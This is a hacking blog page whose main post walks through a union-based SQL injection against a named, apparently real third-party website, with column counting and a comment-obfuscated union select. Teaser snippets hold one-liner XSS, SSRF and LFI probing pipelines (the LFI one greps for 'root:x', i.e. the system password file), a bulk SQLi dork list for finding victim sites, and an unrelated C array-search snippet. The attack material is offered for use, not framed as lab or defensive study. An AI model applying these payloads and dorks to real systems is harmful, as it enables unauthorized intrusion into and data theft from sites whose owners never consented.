Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...
Post a Comment

SQLi-3 Solution

 

solution for {SQLi CHALLENGE }

.

the link to test

.

http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184

.

first let's get column count

.

manifestation_id=184  order by 7 -- - error

.

manifestation_id=184  order by 6 -- - no error column count is 6 

.

http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184 and 0 union /*!50000select*/ 1,2,3,4,5,6 -- -

.

now there no Vulnerable Columns On Page

.

I think you will now make all column null or search in source page

.

but not all column need to be false , some column need to be true to fix like 1,1,1-- -

.

http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184 and 0 union /*!50000select*/ 1,1,1,1,1,1 -- -

.

work good

.

column 5 need to fix by make it true

.

http://www.e-kinologija(.)com/prijave/show_entry.php?manifestation_id=184 and 0 union /*!50000select*/ 1,2,3,4,1,6 -- -

.

and as ' false '  I can add ' true '  to column to fix it like

.

1,2,3,4,true,6-- -

.

so when you try to fix columns just try this method first

.

false

.

union select 0,0,0,0-- -

.

true

.

union select 1,1,1,1-- -

.

Done


Comments

Post a Comment

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

Image
Huge Sql injection Dork list By Shehzad Roy Just copy it and Followed it........... view_items.php?id= home.php?cat= item_book.php?CAT= www/index.php?page= schule/termine.php?view= goods_detail.php?data= storemanager/contents/item.php?page_code= view_items.php?id= customer/board.htm?mode= help/com_view.html?code= n_replyboard.php?typeboard= eng_board/view.php?T****= prev_results.php?prodID= bbs/view.php?no= gnu/?doc= zb/view.php?uid= global/product/product.php?gubun= m_view.php?ps_db= productlist.php?tid= product-list.php?id= onlinesales/product.php?product_id= garden_equipment/Fruit-Cage/product.php?pr= product.php?shopprodid= product_info.php?products_id= productlist.php?tid= showsub.php?id= productlist.php?fid= products.php?cat= products.php?cat= product-list.php?id= product.php?sku= store/product.php?productid= products.php?cat= productList.php?cat= product_detail.php?product_id= product.php?pid= view_items.php?id= more_details.php?id= county-facts/diary/vcsgen.php?id= idlechat/mes...
Read more

How to find index of the Array in C

 #include<stdio.h> int main() {              int i,num,s,flag=0;     int a[10];     printf("How many elements you want to enter :  ");     scanf("%d",&num);     printf("Enter %d elements in the Array ", num);     for(i=0; i<num; i++){     scanf("%d",&a[i]); } printf("Enter the Element you to Search : "); scanf("%d",&s); for(i=0; i<num; i++){ if(a[i]==s){ flag=1; break; } }  if (flag==0){ printf("Not Found "); }else { printf("Element Found "); for(i=0; i<num; i++){ if(a[i]==s) { printf("%d is Present at Location %d \n",s,i+1); break; } } } return 0; }     
Read more